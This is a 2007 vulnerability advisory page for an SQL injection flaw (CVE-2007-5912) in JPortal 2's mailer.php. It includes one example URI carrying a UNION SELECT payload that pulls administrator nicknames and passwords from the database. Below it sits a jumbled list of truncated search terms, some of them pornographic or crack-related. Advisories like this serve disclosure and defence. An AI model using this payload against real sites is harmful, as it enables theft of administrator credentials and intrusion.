about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , JPortal Mailer.PHP SQL Injection Vulnerability


Title JPortal Mailer.PHP SQL Injection Vulnerability
Published 2007-11-06-12:00AM
Updated 2007-11-19-05:24PM
Class Input Validation Error
CVE   CVE-2007-5912
Remote  Yes
Local  No
Credit  Kacper is credited with the discovery of this vulnerability.
Vulnerable  JPortal JPortal 2
Not Vulnerable  
Code  Attackers can use a browser to exploit this issue.The following example URI is available:http://www.example.com/mailer.php?to=999999999999'+union+select+0,1,2,3,4,5,concat(nick,char(58),pass),7+from+admins+limit+1/*
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Thu, 17 Dec 2009 12:25:23 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
WWW. Video www.021qt. www.78956. 200+%252Fm freepooma CMS is Fre any Www.desese mambo Remo Sex Film Crack+Data freepornvi jdsm.testg sexy girls 8800 www.zhangf sex with a Sex viedio women sex execute ex rnescape a Web Wiz Jo Www.sexy.i iisugimysu crack data Www.play.c Mhotties.c sexy picto photo nude news for c www.indian blog.redfl Www.sex400 panipat sexvietnam .Xxlsex OpenBSD 4. club.banda sakila oldmangay. Searching www.youtub IP.Board 2 petite sal www.youtub meerajas php-nuke 2 in the vip Searching 5TP0215OKS